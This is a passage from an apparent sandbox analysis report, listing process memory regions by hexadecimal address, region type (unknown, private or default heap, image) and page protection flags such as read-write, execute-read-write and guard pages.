unkown
|
page readonly
|
||
49FD000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
3663000
|
unkown
|
page read and write
|
||
12CC5000
|
unkown
|
page read and write
|
||
17B000
|
unkown
|
page read and write
|
||
BF70000
|
unkown
|
page read and write
|
||
3A87000
|
unkown
|
page read and write
|
||
2540000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
2EE000
|
unkown
|
page read and write
|
||
476000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
3840000
|
unkown
|
page readonly
|
||
B09E000
|
unkown
|
page read and write
|
||
2E50000
|
unkown
|
page read and write
|
||
28BA000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
2E50000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
2AA0000
|
heap private
|
page execute and read and write
|
||
2F0000
|
heap private
|
page read and write
|
||
4510000
|
unkown
|
page execute and read and write
|
||
550000
|
unkown
|
page readonly
|
||
2C90000
|
unkown
|
page readonly
|
||
AD0000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page read and write
|
||
4800000
|
heap private
|
page read and write
|
||
7B40000
|
unkown
|
page read and write
|
||
35A2000
|
unkown
|
page readonly
|
||
2C90000
|
unkown
|
page read and write
|
||
597A000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page read and write
|
||
2B30000
|
unkown
|
page readonly
|
||
2E1F000
|
unkown
|
page read and write
|
||
28C9000
|
unkown
|
page read and write
|
||
39A9000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
3B9C000
|
unkown
|
page read and write
|
||
1E20000
|
unkown
|
page read and write
|
||
36D7000
|
unkown
|
page read and write
|
||
2F47000
|
unkown
|
page read and write
|
||
30C8000
|
unkown
|
page read and write
|
||
7FF00150000
|
unkown
|
page read and write
|
||
4FA000
|
heap default
|
page read and write
|
||
9D79000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
3986000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
2350000
|
unkown
|
page readonly
|
||
1E10000
|
unkown
|
page readonly
|
||
34E5000
|
unkown
|
page read and write
|
||
2597000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page write copy
|
||
2A20000
|
unkown
|
page readonly
|
||
1E50000
|
unkown
|
page readonly
|
||
7FF00210000
|
unkown
|
page execute and read and write
|
||
5DED000
|
unkown
|
page readonly
|
||
2890000
|
unkown
|
page read and write
|
||
3B30000
|
unkown
|
page read and write
|
||
31F2000
|
unkown
|
page read and write
|
||
2E60000
|
unkown
|
page readonly
|
||
F0000
|
unkown
|
page read and write
|
||
2EFE000
|
heap private
|
page read and write
|
||
2EF5000
|
heap private
|
page read and write
|
||
30EC000
|
unkown
|
page read and write
|
||
2FCA000
|
unkown
|
page read and write
|
||
2C0000
|
heap default
|
page read and write
|
||
2FA5000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
B322000
|
unkown
|
page read and write
|
||
30DC000
|
unkown
|
page read and write
|
||
30C2000
|
unkown
|
page read and write
|
||
3AEF000
|
unkown
|
page read and write
|
||
2FAA000
|
unkown
|
page read and write
|
||
2C80000
|
unkown
|
page read and write
|
||
2CFF000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
60000
|
unkown
|
page readonly
|
||
44B0000
|
unkown
|
page write copy
|
||
39BA000
|
unkown
|
page read and write
|
||
3B64000
|
unkown
|
page read and write
|
||
3202000
|
unkown
|
page read and write
|
||
30D000
|
unkown
|
page read and write
|
||
3163000
|
unkown
|
page read and write
|
||
7FF0000A000
|
unkown
|
page execute and read and write
|
||
B1B000
|
unkown
|
page execute and read and write
|
||
2CD0000
|
unkown
|
page write copy
|
||
890000
|
unkown
|
page execute and read and write
|
||
43BC000
|
unkown
|
page read and write
|
||
407000
|
heap default
|
page read and write
|
||
D5000
|
unkown
|
page read and write | page guard
|
||
130A2000
|
unkown
|
page read and write
|
||
1FF4000
|
unkown
|
page read and write
|
||
2FBE000
|
unkown
|
page read and write
|
||
3A83000
|
unkown
|
page read and write
|
||
21E0000
|
unkown
|
page readonly
|
||
22C0000
|
unkown
|
page readonly
|
||
2520000
|
unkown
|
page readonly
|
||
7410000
|
unkown
|
page read and write
|
||
2A80000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
1B3F9000
|
unkown
|
page read and write
|
||
1BA70000
|
unkown
|
page read and write
|
||
C88000
|
unkown image
|
page execute read
|
||
7A9B000
|
unkown
|
page read and write
|
||
2F6B000
|
unkown
|
page read and write
|
||
3A1C000
|
unkown
|
page read and write
|
||
1B505000
|
unkown
|
page read and write
|
||
323000
|
unkown
|
page read and write
|
||
3B6E000
|
unkown
|
page read and write
|
||
430000
|
unkown
|
page read and write
|
||
2587000
|
unkown
|
page readonly
|
||
2F42000
|
unkown
|
page read and write
|
||
2AB0000
|
heap private
|
page execute and read and write
|
||
8471000
|
unkown
|
page read and write
|
||
1BF0D000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
A8E000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
3B08000
|
unkown
|
page read and write
|
||
3A77000
|
unkown
|
page read and write
|
||
27F0000
|
unkown
|
page readonly
|
||
29C0000
|
unkown
|
page readonly
|
||
38A0000
|
unkown
|
page readonly
|
||
2D0000
|
heap default
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
301D000
|
unkown
|
page read and write
|
||
1B4C0000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page readonly
|
||
2BC0000
|
unkown
|
page write copy
|
||
3170000
|
unkown
|
page read and write
|
||
1BC0000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
2EE0000
|
unkown
|
page readonly
|
||
4B30000
|
unkown
|
page readonly
|
||
8654000
|
unkown
|
page read and write
|
||
77F0000
|
unkown
|
page read and write
|
||
90D2000
|
unkown
|
page readonly
|
||
70FE000
|
unkown
|
page read and write
|
||
2550000
|
unkown
|
page read and write
|
||
36E7000
|
unkown
|
page read and write
|
||
424000
|
heap private
|
page read and write
|
||
4060000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
43D000
|
unkown
|
page read and write
|
||
3198000
|
unkown
|
page read and write
|
||
18C000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page read and write
|
||
2C2000
|
heap default
|
page read and write
|
||
2E8000
|
unkown
|
page read and write
|
||
346000
|
unkown
|
page read and write
|
||
260000
|
heap default
|
page read and write
|
||
2710000
|
unkown
|
page readonly
|
||
3DA000
|
heap default
|
page read and write
|
||
7FF001E7000
|
unkown
|
page read and write
|
||
2E40000
|
unkown
|
page read and write
|
||
A00000
|
unkown
|
page execute and read and write
|
||
28EF000
|
unkown
|
page read and write
|
||
36D4000
|
unkown
|
page read and write
|
||
70000
|
unkown
|
page read and write
|
||
2270000
|
unkown
|
page read and write
|
||
1B415000
|
unkown
|
page read and write
|
||
2910000
|
unkown
|
page read and write
|
||
303C000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
3A7B000
|
unkown
|
page read and write
|
||
29D7000
|
unkown
|
page readonly
|
||
411000
|
heap default
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
BC73000
|
heap private
|
page read and write
|
||
2B50000
|
unkown
|
page readonly
|
||
479000
|
heap private
|
page read and write
|
||
306E000
|
unkown
|
page read and write
|
||
25A0000
|
unkown
|
page readonly
|
||
2890000
|
unkown
|
page read and write
|
||
3B1E000
|
unkown
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
617000
|
unkown
|
page read and write
|
||
C94000
|
unkown image
|
page readonly
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
60000
|
unkown
|
page readonly
|
||
3110000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
2F0000
|
heap default
|
page read and write
|
||
2712000
|
unkown
|
page read and write
|
||
2E90000
|
unkown
|
page read and write
|
||
12C35000
|
unkown
|
page read and write
|
||
C8B0000
|
unkown
|
page read and write
|
||
2945000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
3AFF000
|
unkown
|
page read and write
|
||
2070000
|
unkown
|
page readonly
|
||
3B90000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
810000
|
unkown
|
page execute and read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
6F70000
|
unkown
|
page read and write
|
||
2C80000
|
unkown
|
page read and write
|
||
861C000
|
unkown
|
page read and write
|
||
7FF00012000
|
unkown
|
page execute and read and write
|
||
7FF00020000
|
unkown
|
page read and write
|
||
6888000
|
unkown
|
page readonly
|
||
76C0000
|
heap private
|
page read and write
|
||
454C000
|
unkown
|
page read and write
|
||
305B000
|
unkown
|
page read and write
|
||
195000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
A3B9000
|
unkown
|
page write copy
|
||
231000
|
heap default
|
page read and write
|
||
3395000
|
unkown
|
page read and write
|
||
1BF5000
|
heap private
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
4253000
|
unkown
|
page read and write
|
||
332B000
|
unkown
|
page read and write
|
||
35F0000
|
unkown
|
page read and write
|
||
3265000
|
unkown
|
page read and write
|
||
7FF000EA000
|
unkown
|
page execute and read and write
|
||
48B0000
|
heap private
|
page read and write
|
||
AE0000
|
unkown
|
page read and write
|
||
2FC4000
|
unkown
|
page read and write
|
||
4660000
|
unkown
|
page readonly
|
||
180000
|
unkown
|
page write copy
|
||
2F96000
|
unkown
|
page read and write
|
||
210000
|
heap default
|
page read and write
|
||
2B20000
|
unkown
|
page readonly
|
||
1B0000
|
unkown
|
page read and write
|
||
2090000
|
unkown
|
page execute and read and write
|
||
8FD000
|
unkown
|
page read and write
|
||
33B0000
|
unkown
|
page read and write
|
||
BD2000
|
unkown image
|
page execute and write copy
|
||
3542000
|
unkown
|
page readonly
|
||
7FF00260000
|
unkown
|
page read and write
|
||
2960000
|
unkown
|
page readonly
|
||
1F5000
|
heap default
|
page read and write
|
||
390000
|
unkown
|
page readonly
|
||
590000
|
unkown
|
page read and write
|
||
2A50000
|
unkown
|
page write copy
|
||
160000
|
unkown
|
page read and write
|
||
2C60000
|
unkown
|
page read and write
|
||
C61B000
|
unkown
|
page read and write
|
||
5AB0000
|
unkown
|
page readonly
|
||
4263000
|
unkown
|
page read and write
|
||
2950000
|
unkown
|
page readonly
|
||
CA8000
|
unkown image
|
page readonly
|
||
AF0000
|
unkown
|
page readonly
|
||
1B300000
|
unkown
|
page read and write
|
||
4470000
|
unkown
|
page readonly
|
||
1F6000
|
unkown
|
page read and write
|
||
2A71000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
3514000
|
unkown
|
page readonly
|
||
2F2E000
|
unkown
|
page read and write
|
||
3940000
|
unkown
|
page read and write
|
||
39F4000
|
unkown
|
page read and write
|
||
2C5F000
|
unkown
|
page read and write
|
||
648E000
|
unkown
|
page read and write
|
||
1FC000
|
unkown
|
page read and write
|
||
3516000
|
unkown
|
page read and write
|
||
1BA55000
|
unkown
|
page read and write
|
||
1B475000
|
unkown
|
page read and write
|
||
25F2000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
35C4000
|
unkown
|
page read and write
|
||
1BC7E000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
62C5000
|
unkown
|
page readonly
|
||
1BA44000
|
unkown
|
page read and write
|
||
687000
|
unkown
|
page read and write
|
||
182000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
710B000
|
unkown
|
page read and write
|
||
2E4F000
|
unkown
|
page read and write
|
||
3105000
|
unkown
|
page read and write
|
||
2EF9000
|
heap private
|
page read and write
|
||
2E40000
|
unkown
|
page read and write
|
||
27D0000
|
heap private
|
page read and write
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
19B000
|
unkown
|
page execute and read and write
|
||
2EC0000
|
unkown
|
page readonly
|
||
73EE000
|
unkown
|
page read and write
|
||
290000
|
heap private
|
page read and write
|
||
490000
|
heap default
|
page read and write
|
||
12C5C000
|
unkown
|
page read and write
|
||
2E71000
|
unkown
|
page read and write
|
||
5A20000
|
heap private
|
page read and write
|
||
2F1000
|
unkown
|
page read and write
|
||
2533000
|
unkown
|
page read and write
|
||
2A4F000
|
unkown
|
page read and write
|
||
3700000
|
unkown
|
page read and write
|
||
2070000
|
unkown
|
page readonly
|
||
B0000
|
unkown
|
page readonly
|
||
42E000
|
heap default
|
page read and write
|
||
7FF00112000
|
unkown
|
page execute and read and write
|
||
3031000
|
unkown
|
page read and write
|
||
1BCF000
|
unkown
|
page read and write
|
||
4AC0000
|
unkown
|
page read and write
|
||
854C000
|
unkown
|
page read and write
|
||
2900000
|
unkown
|
page read and write
|
||
697F000
|
unkown
|
page read and write
|
||
406000
|
heap default
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
1B50000
|
unkown
|
page read and write
|
||
5E4A000
|
unkown
|
page readonly
|
||
612000
|
unkown
|
page read and write
|
||
1D10000
|
unkown
|
page readonly
|
||
B2C3000
|
heap private
|
page read and write
|
||
7FF00150000
|
unkown
|
page execute and read and write
|
||
2310000
|
unkown
|
page execute and read and write
|
||
51C0000
|
unkown
|
page read and write
|
||
B70000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
39E0000
|
unkown
|
page read and write
|
||
C330000
|
unkown
|
page read and write
|
||
2CBE000
|
unkown
|
page read and write | page guard
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
C94000
|
unkown image
|
page readonly
|
||
3512000
|
unkown
|
page readonly
|
||
34E000
|
heap default
|
page read and write
|
||
1BA61000
|
unkown
|
page read and write
|
||
A3BE000
|
unkown
|
page write copy
|
||
2280000
|
unkown
|
page read and write
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
BB20000
|
unkown
|
page read and write
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
233F000
|
unkown
|
page read and write
|
||
65CF000
|
unkown
|
page read and write
|
||
B0D0000
|
unkown
|
page read and write
|
||
330E000
|
unkown
|
page read and write
|
||
2070000
|
unkown
|
page readonly
|
||
1B485000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
842E000
|
unkown
|
page read and write
|
||
2A60000
|
unkown
|
page read and write
|
||
670000
|
unkown
|
page read and write
|
||
352D000
|
unkown
|
page read and write
|
||
37E000
|
heap default
|
page read and write
|
||
2660000
|
unkown
|
page readonly
|
||
660000
|
unkown
|
page execute and read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
4500000
|
unkown
|
page readonly
|
||
2FCD000
|
unkown
|
page read and write
|
||
34F2000
|
unkown
|
page readonly
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
6DEF000
|
unkown
|
page readonly
|
||
2150000
|
unkown
|
page write copy
|
||
7FF0001A000
|
unkown
|
page execute and read and write
|
||
1BE0000
|
unkown
|
page read and write
|
||
2F8E000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page read and write
|
||
ADCE000
|
unkown
|
page read and write
|
||
7FF001D0000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page readonly
|
||
1EB0000
|
unkown
|
page readonly
|
||
30BA000
|
unkown
|
page read and write
|
||
8555000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
44C0000
|
unkown
|
page read and write
|
||
3D0000
|
unkown
|
page readonly
|
||
35DD000
|
unkown
|
page read and write
|
||
31DE000
|
unkown
|
page read and write
|
||
7EF40000
|
unkown
|
page execute and read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
231B000
|
unkown
|
page readonly
|
||
3B1B000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page read and write
|
||
670000
|
unkown
|
page read and write
|
||
432F000
|
unkown
|
page read and write
|
||
1CB4E000
|
unkown
|
page read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
12D41000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
AF6E000
|
unkown
|
page read and write
|
||
5B71000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page read and write
|
||
2540000
|
unkown
|
page read and write
|
||
46B0000
|
unkown
|
page read and write
|
||
AF0000
|
heap private
|
page execute and read and write
|
||
2382000
|
unkown
|
page read and write
|
||
32F5000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
179000
|
unkown
|
page read and write
|
||
39AF000
|
unkown
|
page read and write
|
||
2CC1000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
230000
|
unkown
|
page readonly
|
||
2260000
|
unkown
|
page read and write
|
||
6695000
|
unkown
|
page readonly
|
||
35D8000
|
unkown
|
page read and write
|
||
2EF0000
|
heap private
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
77F9000
|
unkown
|
page read and write
|
||
2D30000
|
unkown
|
page read and write
|
||
1E05000
|
heap private
|
page read and write
|
||
1BC2E000
|
unkown
|
page read and write
|
||
2EB7000
|
unkown
|
page read and write
|
||
4616000
|
unkown
|
page read and write
|
||
1B9A000
|
unkown
|
page read and write
|
||
336F000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
58AF000
|
unkown
|
page read and write
|
||
24F000
|
unkown
|
page read and write
|
||
3049000
|
unkown
|
page read and write
|
||
5680000
|
heap private
|
page read and write
|
||
1110000
|
unkown
|
page readonly
|
||
7FF00170000
|
unkown
|
page read and write
|
||
13040000
|
unkown
|
page read and write
|
||
680000
|
unkown
|
page readonly
|
||
2E9A000
|
unkown
|
page read and write
|
||
10000
|
heap private
|
page read and write
|
||
600000
|
unkown
|
page read and write
|
||
32AA000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
3B75000
|
unkown
|
page read and write
|
||
2341000
|
unkown
|
page read and write
|
||
3199000
|
unkown
|
page read and write
|
||
7FF000C0000
|
unkown
|
page read and write
|
||
880000
|
unkown
|
page execute and read and write
|
||
2720000
|
unkown
|
page read and write
|
||
3B4B000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
2510000
|
unkown
|
page write copy
|
||
35B1000
|
unkown
|
page read and write
|
||
2AD000
|
heap default
|
page read and write
|
||
2F7F000
|
unkown
|
page read and write
|
||
3014000
|
unkown
|
page read and write
|
||
218000
|
heap default
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
1E9000
|
heap default
|
page read and write
|
||
3D0000
|
unkown
|
page readonly
|
||
8AC2000
|
unkown
|
page readonly
|
||
237C000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page read and write
|
||
3726000
|
unkown
|
page read and write
|
||
34A8000
|
unkown
|
page read and write
|
||
2AF0000
|
unkown
|
page read and write
|
||
34A1000
|
unkown
|
page read and write
|
||
7FF001C0000
|
unkown
|
page execute and read and write
|
||
420000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page read and write
|
||
1B40000
|
unkown
|
page readonly
|
||
1D7000
|
heap default
|
page read and write
|
||
20FF000
|
unkown
|
page read and write
|
||
28A0000
|
unkown
|
page readonly
|
||
3642000
|
unkown
|
page readonly
|
||
3A60000
|
unkown
|
page read and write
|
||
997000
|
unkown
|
page execute and read and write
|
||
2260000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
2E70000
|
unkown
|
page read and write
|
||
207E000
|
unkown
|
page read and write
|
||
C88000
|
unkown image
|
page execute read
|
||
299000
|
unkown
|
page read and write
|
||
1B50A000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
2A40000
|
unkown
|
page readonly
|
||
3A23000
|
unkown
|
page read and write
|
||
30CD000
|
unkown
|
page read and write
|
||
364D000
|
unkown
|
page read and write
|
||
2000000
|
unkown
|
page read and write
|
||
2FC9000
|
unkown
|
page read and write
|
||
2F7E000
|
unkown
|
page read and write
|
||
3006000
|
unkown
|
page read and write
|
||
3980000
|
unkown
|
page read and write
|
||
582B000
|
unkown
|
page read and write
|
||
29F000
|
unkown
|
page read and write
|
||
1B890000
|
unkown
|
page write copy
|
||
2EC000
|
heap default
|
page read and write
|
||
288F000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
12CC1000
|
unkown
|
page read and write
|
||
2F06000
|
unkown
|
page read and write
|
||
2CD0000
|
unkown
|
page write copy
|
||
35D2000
|
unkown
|
page readonly
|
||
7FF001E7000
|
unkown
|
page read and write
|
||
4051000
|
unkown
|
page read and write
|
||
CA8000
|
unkown image
|
page readonly
|
||
4EE000
|
unkown
|
page read and write
|
||
12DA1000
|
unkown
|
page read and write
|
||
2714000
|
heap private
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
2C31000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
1E3000
|
heap default
|
page read and write
|
||
49A000
|
heap default
|
page read and write
|
||
300000
|
unkown
|
page readonly
|
||
2EFD000
|
unkown
|
page read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
47A0000
|
unkown
|
page read and write
|
||
2FC000
|
heap default
|
page read and write
|
||
2A50000
|
unkown
|
page readonly
|
||
2FF0000
|
unkown
|
page read and write
|
||
414D000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
2AF0000
|
heap private
|
page execute and read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
2DF000
|
unkown
|
page read and write
|
||
26C0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
1C950000
|
unkown
|
page read and write
|
||
C94000
|
unkown image
|
page readonly
|
||
3793000
|
unkown
|
page read and write
|
||
2F44000
|
unkown
|
page read and write
|
||
1BEF000
|
unkown
|
page read and write
|
||
1B86000
|
unkown
|
page read and write
|
||
2E78000
|
unkown
|
page read and write
|
||
2AF0000
|
unkown
|
page read and write
|
||
419A000
|
unkown
|
page read and write
|
||
27CA000
|
unkown
|
page read and write
|
||
1B3E6000
|
unkown
|
page read and write
|
||
2F56000
|
unkown
|
page read and write
|
||
2BB000
|
heap default
|
page read and write
|
||
202B000
|
heap private
|
page read and write
|
||
2B40000
|
unkown
|
page readonly
|
||
2F5D000
|
unkown
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
2DEF000
|
unkown
|
page read and write
|
||
9768000
|
unkown
|
page readonly
|
||
3672000
|
unkown
|
page readonly
|
||
2A50000
|
unkown
|
page readonly
|
||
304C000
|
unkown
|
page read and write
|
||
7410000
|
heap private
|
page read and write
|
||
B14B000
|
unkown
|
page read and write
|
||
3150000
|
unkown
|
page read and write
|
||
8666000
|
unkown
|
page read and write
|
||
2EF0000
|
heap private
|
page read and write
|
||
1BF8E000
|
unkown
|
page read and write
|
||
369C000
|
unkown
|
page read and write
|
||
86B0000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
8040000
|
unkown
|
page read and write
|
||
2F4D000
|
unkown
|
page read and write
|
||
2170000
|
unkown
|
page execute and read and write
|
||
4B50000
|
unkown
|
page readonly
|
||
1C730000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
270000
|
unkown
|
page execute and read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
3ADF000
|
unkown
|
page read and write
|
||
2710000
|
unkown
|
page readonly
|
||
1BD30000
|
unkown
|
page read and write
|
||
27D4000
|
heap private
|
page read and write
|
||
3566000
|
unkown
|
page readonly
|
||
3592000
|
unkown
|
page read and write
|
||
3649000
|
unkown
|
page readonly
|
||
7FF00150000
|
unkown
|
page read and write
|
||
2550000
|
unkown
|
page read and write
|
||
2DEE000
|
unkown
|
page read and write | page guard
|
||
265C000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
28B0000
|
unkown
|
page read and write
|
||
3BB8000
|
unkown
|
page read and write
|
||
430000
|
unkown
|
page execute and read and write
|
||
110000
|
unkown
|
page read and write
|
||
34D2000
|
unkown
|
page readonly
|
||
2E60000
|
unkown
|
page readonly
|
||
681000
|
unkown
|
page read and write
|
||
12E1C000
|
unkown
|
page read and write
|
||
2B8000
|
heap default
|
page read and write
|
||
3A6D000
|
unkown
|
page read and write
|
||
28EF000
|
unkown
|
page read and write
|
||
2FD0000
|
unkown
|
page read and write
|
||
3703000
|
unkown
|
page read and write
|
||
26A0000
|
unkown
|
page readonly
|
||
9E0000
|
unkown
|
page read and write
|
||
2EF5000
|
heap private
|
page read and write
|
||
3AA0000
|
unkown
|
page read and write
|
||
2F70000
|
unkown
|
page readonly
|
||
68AE000
|
unkown
|
page readonly
|
||
4226000
|
unkown
|
page read and write
|
||
2E38000
|
unkown
|
page read and write
|
||
293E000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
29D0000
|
unkown
|
page readonly
|
||
3136000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
3412000
|
unkown
|
page readonly
|
||
1B390000
|
unkown
|
page read and write
|
||
3185000
|
unkown
|
page read and write
|
||
3635000
|
unkown
|
page readonly
|
||
1E4000
|
heap private
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
16E000
|
unkown
|
page read and write
|
||
2EE0000
|
unkown
|
page readonly
|
||
C6CF000
|
unkown
|
page read and write
|
||
30FC000
|
unkown
|
page read and write
|
||
2C70000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
1BDF000
|
unkown
|
page read and write
|
||
34D4000
|
unkown
|
page readonly
|
||
1B59D000
|
unkown
|
page read and write
|
||
39E8000
|
unkown
|
page read and write
|
||
3151000
|
unkown
|
page read and write
|
||
62AE000
|
unkown
|
page read and write
|
||
65CE000
|
unkown
|
page read and write | page guard
|
||
50A000
|
unkown
|
page read and write
|
||
35C7000
|
unkown
|
page read and write
|
||
304C000
|
unkown
|
page read and write
|
||
82B0000
|
unkown
|
page read and write
|
||
4460000
|
unkown
|
page read and write
|
||
688B000
|
unkown
|
page readonly
|
||
3129000
|
unkown
|
page read and write
|
||
2190000
|
unkown
|
page execute and read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
5070000
|
heap private
|
page execute and read and write
|
||
D4000
|
heap private
|
page read and write
|
||
35AE000
|
unkown
|
page read and write
|
||
3AA9000
|
unkown
|
page read and write
|
||
26D0000
|
unkown
|
page readonly
|
||
35D5000
|
unkown
|
page read and write
|
||
3058000
|
unkown
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
2F70000
|
unkown
|
page readonly
|
||
1B410000
|
unkown
|
page read and write
|
||
43D000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
2060000
|
unkown
|
page readonly
|
||
9F6000
|
unkown
|
page read and write
|
||
115000
|
unkown
|
page read and write | page guard
|
||
1B0000
|
unkown
|
page read and write
|
||
7FF00002000
|
unkown
|
page execute and read and write
|
||
2B80000
|
unkown
|
page read and write
|
||
856E000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page execute and read and write
|
||
3572000
|
unkown
|
page readonly
|
||
2FC7000
|
unkown
|
page read and write
|
||
3797000
|
unkown
|
page read and write
|
||
4297000
|
unkown
|
page read and write
|
||
22E7000
|
heap private
|
page read and write
|
||
7FF00180000
|
unkown
|
page read and write
|
||
2EF8000
|
unkown
|
page read and write
|
||
4B12000
|
heap private
|
page read and write
|
||
670000
|
unkown
|
page read and write
|
||
3BA0000
|
unkown
|
page read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
51BE000
|
unkown
|
page read and write
|
||
116000
|
unkown
|
page read and write
|
||
24B0000
|
unkown
|
page write copy
|
||
2890000
|
unkown
|
page read and write
|
||
420000
|
heap private
|
page read and write
|
||
1FE0000
|
unkown
|
page read and write
|
||
3080000
|
unkown
|
page read and write
|
||
2FDD000
|
unkown
|
page read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
279E000
|
unkown
|
page read and write
|
||
25B000
|
heap private
|
page read and write
|
||
35F3000
|
unkown
|
page read and write
|
||
CA8000
|
unkown image
|
page readonly
|
||
27B4000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page read and write
|
||
197000
|
unkown
|
page execute and read and write
|
||
4610000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
7FF000C2000
|
unkown
|
page execute and read and write
|
||
318000
|
heap default
|
page read and write
|
||
2F74000
|
unkown
|
page read and write
|
||
3880000
|
unkown
|
page readonly
|
||
4E10000
|
unkown
|
page read and write
|
||
351C000
|
unkown
|
page read and write
|
||
2EE000
|
unkown
|
page read and write
|
||
3653000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
2AF6000
|
unkown
|
page read and write
|
||
2700000
|
unkown
|
page readonly
|
||
2B90000
|
unkown
|
page read and write
|
||
1D60000
|
unkown
|
page write copy
|
||
2FCC000
|
unkown
|
page read and write
|
||
2C90000
|
unkown
|
page read and write
|
||
319B000
|
unkown
|
page read and write
|
||
2BC0000
|
unkown
|
page write copy
|
||
2F04000
|
unkown
|
